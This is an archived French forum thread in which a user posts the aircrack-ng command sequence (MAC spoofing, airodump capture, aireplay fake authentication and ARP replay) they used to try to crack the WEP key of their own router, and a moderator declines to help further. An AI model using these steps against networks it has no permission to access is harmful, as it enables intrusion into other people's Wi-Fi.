Aller au contenu

Probleme avec aircrack


Messages recommandés

Bien le bonjour. :-)

Sachant que le WEP c'est facilement craquable et voulant tester ma Alice box Hitachi (et je precise bien que c'est la mienne), j'ai essaye de cracker sa clef WEP avec aircrack sous backtrack 3. Donc voici ce que j'ai fait, d'apres un tuto :

# airmon-ng stop wlan0

# ifconfig wlan0 down

# maccanger --mac 00:11:22:33:44:55 wlan0

# airmon-ng start wlan0 (c'est la que je fais ctrl+c pour annuler et copier l'adresse MAC de ma box)

# airodump-ng -c 11 -w capture --bssid [mac de ma box] wlan0

Je laisse tourner airodump et j'ouvre un nouveau terminal. La-dedans je mets :

# aireplay-ng -1 0 -a [mac de ma box] -h 00:11:22:33:44:55 wlan0 (authentication et association OK)

# aireplay-ng -3 -b [mac de ma box] -h 00:11:22:33:44:55 wlan0

et c'est la que je suis coince avec 50 000 paquets lus et toujours 0 ARP requests et la MAC de ma carte (la fausse 00:11:22:33:44:55) n'apparaissant plus dans la colonne STATION de airodump.

(je sais que sans autres clients c'est plus lent mais je pense que parmi 50 000 paquets lus il doit y avoir un ARP, non ?)

Je sais que j'ai une carte WiFi qui est entierement compatible avec Linux, une D-Link DWA-510, donc ce n'est pas un probleme materiel, si ?

En tout cas merci de votre aide et de toute facon je vais passer au WPA2, mais je veux faire cette petite experience avant.

Et desole pour l'absence d'accents (clavier qwerty powaa) et pour la longueur du topic.

Lien vers le commentaire
Partager sur d’autres sites

Salut,

un petit mot en passant.

Sans préjuger de l'INterêt de cracker son propre WEP (:dd:), tu comprendras aisément que nous ne te fourniront pas plus de précisions sur la méthode.

Même si la connexion que tu essayes de cracker est bien la tienne, t'apporter plus d'infos serait une aide trop "utile" a d'autres, lecteurs moins consciencieux (avec des volontés moins avouables, donc).

Tout ce que je peux te dire pour ne pas te laisser sans un conseil, c'est de consulter la doc en ligne (en anglais, je crois) d'Aircrack. Tu y trouveras d'autres méthodes pour "générer" des ARP.

Et enfin, en conseil final, passes en WPA2, etc. ;)

Voila.

Je propose la fermeture. :cartonjaune::transpi:

Lien vers le commentaire
Partager sur d’autres sites

Archivé

Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.

×
×
  • Créer...